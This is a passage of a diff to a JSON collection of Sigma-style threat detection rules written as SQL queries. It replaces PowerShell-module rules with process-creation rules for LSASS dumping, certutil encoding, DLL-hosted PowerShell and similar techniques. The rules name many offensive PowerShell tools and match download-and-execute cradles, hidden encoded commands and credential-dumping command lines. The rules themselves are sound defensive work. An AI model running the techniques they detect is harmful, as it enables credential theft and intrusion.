Launcher - PowerShell Module", - "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", - "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "PUA - DIT Snapshot Viewer", + "id": "d3b70aad-097e-409c-9df2-450f80dc476b", + "status": "test", + "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", + "author": "Furkan Caliskan (@caliskanfurkan_)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate admin usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_stdin.yml" + "filename": "proc_creation_win_pua_ditsnap.yml" }, { - "title": "Use Get-NetTCPConnection - PowerShell Module", - "id": "aff815cc-e400-4bf0-a47a-5d8a2407d4e1", + "title": "HackTool - HandleKatz LSASS Dumper Execution", + "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", "status": "experimental", - "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", - "author": "frack113", + "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1049" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Get-NetTCPConnection%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" ], - "filename": 
"posh_pm_susp_get_nettcpconnection.yml" + "filename": "proc_creation_win_hktl_handlekatz.yml" }, { - "title": "Suspicious Computer Machine Password by PowerShell", - "id": "e3818659-5016-4811-a73c-dde4679169d2", + "title": "Microsoft Workflow Compiler Execution", + "id": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d", "status": "test", - "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", - "author": "frack113", + "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.", + "author": "Nik Seetharaman, frack113", "tags": [ - "attack.initial_access", - "attack.t1078" + "attack.defense_evasion", + "attack.execution", + "attack.t1127", + "attack.t1218" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Legitimate MWC use (unlikely in modern enterprise environments)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Reset-ComputerMachinePassword%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR OriginalFileName = 'Microsoft.Workflow.Compiler.exe'))" ], - "filename": "posh_pm_susp_reset_computermachinepassword.yml" + "filename": "proc_creation_win_lolbin_workflow_compiler.yml" }, { - "title": "Malicious PowerShell Scripts - PoshModule", - "id": "41025fd7-0466-4650-a813-574aaacbe7f4", - "status": "experimental", - "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", - "author": "frack113, Nasreddine Bencherchali", + "title": "File Encoded To Base64 Via Certutil.EXE", + "id": 
"e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", + "status": "test", + "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE 
'\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR 
ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' 
OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-encode%' ESCAPE '\\' OR CommandLine LIKE '%/encode%' ESCAPE '\\'))" ], - "filename": "posh_pm_exploit_scripts.yml" + "filename": "proc_creation_win_certutil_encode.yml" }, { - "title": "Potential Active Directory Enumeration Using AD Module - PsModule", - 
"id": "74176142-4684-4d8a-8b0a-713257e7df8e", - "status": "experimental", - "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "title": "Tasks Folder Evasion", + "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "status": "test", + "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", + "author": "Sreeman", "tags": [ - "attack.reconnaissance", - "attack.discovery", - "attack.impact" + "attack.defense_evasion", + "attack.persistence", + "attack.execution", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Import-Module %' ESCAPE '\\' OR Payload LIKE '%ipmo %' ESCAPE '\\') AND Payload LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_active_directory_module_dll_import.yml" + "filename": "proc_creation_win_susp_task_folder_evasion.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific - 
PowerShell Module", - "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "title": "Potential PowerShell Execution Via DLL", + "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", + "status": "test", + "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", + "author": "Markus Neis, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND 
ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_invocation_specific.yml" + "filename": "proc_creation_win_powershell_dll_execution.yml" }, { - "title": "PowerShell Get Clipboard", - "id": 